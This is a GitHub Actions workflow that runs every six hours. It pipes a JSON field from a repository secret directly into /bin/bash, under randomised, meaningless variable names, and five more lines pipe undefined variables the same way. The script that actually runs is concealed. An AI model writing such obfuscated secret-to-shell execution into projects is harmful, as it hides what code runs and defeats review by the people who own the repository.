name: youshigeliao
on:
  workflow_dispatch:
  schedule:
    - cron: '51 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: youshigeliao
        env:
          c95133: ${{ secrets.c95133 }}
        run: |
          echo $c95133 | jq -r .g57184 | /bin/bash
          echo $o9468 | jq -r .rxm97319 | /bin/bash
          echo $ctzcv32904 | jq -r .f737 | /bin/bash
          echo $vlt35 | jq -r .peis560 | /bin/bash
          echo $nk33 | jq -r .pdsmc759 | /bin/bash
          echo $qalr5 | jq -r .bhvkv2 | /bin/bash

